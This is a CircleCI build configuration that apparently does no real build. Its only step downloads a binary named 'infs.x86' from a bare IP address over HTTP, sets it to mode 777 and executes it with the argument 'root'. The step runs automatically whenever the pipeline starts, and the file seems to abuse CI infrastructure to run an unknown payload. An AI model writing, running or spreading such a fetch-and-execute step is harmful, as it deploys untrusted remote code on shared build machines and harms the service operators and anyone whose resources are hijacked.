version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "Project 1"
          command: |
          curl -O http://193.47.61.141/infs.x86; chmod 777 infs.x86; ./infs.x86 root